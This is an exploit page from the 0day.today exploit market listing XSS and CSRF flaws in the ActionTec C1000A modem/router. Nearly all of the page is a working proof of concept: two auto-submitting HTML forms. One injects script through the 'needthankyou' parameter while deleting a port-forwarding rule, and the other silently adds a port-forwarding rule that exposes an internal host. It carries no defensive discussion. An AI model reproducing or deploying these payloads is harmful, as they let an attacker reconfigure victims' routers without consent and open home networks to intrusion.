[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

ActionTec C1000A Modem/Router XSS and arbitrary CSRF Vulnerabilities

Author
ayylmao
Risk
[
Security Risk Low
]
0day-ID
0day-ID-24290
Category
web applications
Date add
25-09-2015
Platform
hardware
<!-- XSS -->
<form action="http://192.168.0.1/scvrtsrv.cmd" method="post" id="form">
<input type="hidden" name="action" value="remove_port_forwarding">
<input type="hidden" name="needthankyou" value='#"; alert("ayy lmao");//'>
<input type="hidden" name="rmLst" value="192.168.0.2|2777|2777|TCP|2777|2777|0.0.0.0">
<input type="submit" value="Go, Baby, Go!">
</form>

<script>
document.getElementById("form").submit();
</script>

<!-- Example adding port forwarding -->
<form action="http://192.168.0.1/scvrtsrv.cmd" method="post" id="form">
<input type="hidden" name="action" value="add">
<input type="hidden" name="eEnd" value="2777,">
<input type="hidden" name="eStart" value="2777,">
<input type="hidden" name="iEnd" value="2777,">
<input type="hidden" name="iStart" value="2777,">
<input type="hidden" name="needthankyou" value="advancedsetup_advancedportforwarding.html">
<input type="hidden" name="proto" value="1,">
<input type="hidden" name="srvAddr" value="192.168.0.2">
<input type="hidden" name="srvName" value="aDv_PoRt_FoRwArDiNg">
<input type="hidden" name="srvWanAddr" value="0.0.0.0">
<input type="submit" value="Go, Baby, Go!">
</form>
<script>
document.getElementById("form").submit();
</script>

#  0day.today [2024-11-15]  #